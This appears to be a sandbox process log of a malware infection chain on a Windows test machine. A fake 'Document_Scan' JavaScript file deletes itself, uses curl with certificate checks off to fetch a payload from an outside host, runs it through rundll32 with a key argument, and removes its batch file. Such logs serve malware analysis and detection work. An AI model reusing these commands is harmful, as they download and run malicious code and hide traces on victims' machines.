wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js
1488cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
2156cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
2204curl.exe curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location
2392cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
2460rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
2528rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
2640cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
2568